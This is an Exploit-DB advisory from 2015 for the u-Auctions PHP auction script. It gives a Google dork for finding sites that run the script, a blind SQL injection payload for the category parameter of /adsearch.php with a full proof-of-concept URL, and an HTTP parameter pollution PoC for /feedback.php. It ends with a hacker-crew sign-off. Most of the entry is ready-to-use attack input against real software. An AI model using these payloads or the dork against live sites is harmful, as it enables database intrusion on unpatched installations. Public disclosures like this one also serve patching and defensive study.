u-Auctions - Multiple Vulnerabilities

EDB-ID:

36641

CVE:


Author:

*Don*

Type:

webapps

Platform:

PHP

Published:

2015-04-05

# Exploit Title: *u-Auctions Multiple Vulnerabilities*
# Google Dork: "*Powered by u-Auctions** ©*"
# Date: *03 April 2015*
# Exploit Author: *Don*
# Vendor Homepage: https://www.*u-auctions.com <http://u-auctions.com>*/
# Version: *ALL*
# Tested on: *Debian*

*1. Blind SQL injection*:

This vulnerability affects */adsearch.php*
URL encoded POST input *category* was set to
*(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/*

*POC:*

*http://www <http://www>.targetsite.com
<http://targetsite.com>/adsearch.php=action=search&buyitnow=y&buyitnowonly=y&category=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&closed=y&country=Afghanistan&csrftoken=59b61458fbbb4d6d44a4880717a3350a&desc=y&ending=1&go=GO%20%3E%3E&maxprice=1&minprice=1&payment%5b%5d=paypal&seller=1&SortProperty=ends&title=Mr.&type=2&zipcode=94102*

*Done*
*+-------------------------------------------------------------------------------------------------------------------------------------+*
*2. HTTP parameter pollution*
This vulnerability affects /*feedback.php*

URL encoded GET input *id* was set to *1&n903553=v972172*
Parameter precedence: *last occurrence*
Affected parameter: *user_id=1*

The impact depends on the affected web application.
*An attacker could*:
*1* = Override existing hardcoded HTTP parameters
*2* = Modify the application behaviors
*3* = Access and, potentially exploit, uncontrollable variables
*4* = Bypass input validation checkpoints and WAFs rules

POC:

*http://www <http://www>.targetsite.com
<http://targetsite.com>/feedback.php?faction=show&id=1%26n903553%3dv972172*
*Done*
*+-------------------------------------------------------------------------------------------------------------------------------------+*
*There is XSS too but I don't see it useful for anything, so will skip it.*
*Cheers folks, Don (Balcan Crew) is back! :)*
*Have fun and have friends!*
*Shouts to my good friends from past / whoever is online / this website and
new kids from the localhost.*
*~Don 2015*